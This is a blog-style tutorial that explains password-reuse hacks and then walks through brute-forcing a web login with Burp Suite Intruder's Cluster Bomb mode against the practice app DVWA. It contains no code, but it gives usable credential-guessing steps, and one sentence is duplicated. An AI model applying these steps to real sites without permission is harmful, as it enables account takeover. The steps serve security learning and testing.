Following celebrity news is a lot like watching a bad horror movie. You’re constantly wondering why every decision they make is just so stupid. Whether we’re watching Friday the 13th or TMZ, we always end up yelling “No! Stop!” at our screens. We lift our chins up boldly and proclaim “I’d never do such a thing!”. That, or we shrug our shoulders and mumble “Can’t be helped” if something random and extraordinary happens to them. That’s pretty much what I did when a month ago a huge LinkedIn password dump led to hackers gaining access to thousands of Twitter accounts, including Mark Zuckerberg’s, not that he uses his much anyway.
What I’m saying is we think our passwords are very secure, or maybe just secure enough, until it’s too late. This particular hack happened because people tend to use the same password everywhere, or at the very least the passwords are very similar. In the case of Mark Zuckerberg, I can only imagine his LinkedIn and Twitter passwords to be Faceb00kRul3z. This is not the only way to gain access to someone’s account, however. A very common way is to get a very powerful computer to enter every possible character it can in the hopes that it’ll get a match. Burp Suite is a very powerful tool for doing this, just remember to only use it with the consent of the site owner and without malice.
The first thing you’ll want to do is load up Burp Suite (assuming you have it set up already).
Then, go to the web application you want to break into. Click around on it, or use Burp Spider until you have enough information on the site or have found the page you want to enter. As an example, I’ll use DVWA, which is a free open-source web app made specifically to have its vulnerabilities exploited.
What you want to do now is just enter anything into both fields and click login. The point right now is not to guess the password, but to show Burp what the response to your invalid input is. Now open your Burp window, open up the Target tab and the Site Map subtab, and find the page and request that your invalid login attempt is in. Right-click on the request and click ‘Send to Intruder’.
Now Burp Intruder can work with the web page. Go to the Intruder tab and the Positions subtab. You should see the request script, with bits bolded in. That’s Burp letting you know where it found a login textbox or a cookie that it thinks you can work with. Find the pieces of text that you want to fuzz and use the ‘Clear’ button on the right to clear the pieces of text you want to leave alone. Above all the code there’s a drop-down bar that asks you what attack type you want.
There are four attack types: Sniper is used when you only have one piece of code you want to break into (called a position), so it throws data at it (called a payload) one by one. Battering Ram works with several positions and inserts the same payload into them all at once. Pitchfork uses several sets of payloads where it enters the different payloads into different positions at the same time. For example, if you had two positions and two payload sets, it would enter the first payload from the first set into the first position and the first payload from the second set into the second position, then the second payload from the first set into the first position and the second payload from the second set into the second position, and so on. Cluster Bomb sets the same payload into one position while running through every payload in another, then sets the second payload into the first position while running through every payload, then the third, until it finds a match. This is what we want to use since we don’t know what usernames work with what passwords, so select that.
Now go into the Payloads subtab. The Payload Options section is where you’ll enter the payloads that you want to be used. Either enter them by hand, or copy and paste them, or if you have the premium version, load them from the Add From List drop-down box, where Burp already prepared some for you. You can change what set you’re editing in the drop-down option in the Payload Sets section. After you’ve got all of that done
After you’ve got all of that done, you’re ready to fuzz, just press Start Attack in the top right corner of the window and your login attempts will show up on the screen. A status of 302 means your login was invalid, a status of 200 means you broke in.
And that’s it, now you just wait and hope for the best. You may have noticed that most of the passwords are quite similar, which would make a malicious hacker’s job much easier. If you can, change your password to something a little more complex, you’ll save yourself a world of regret later.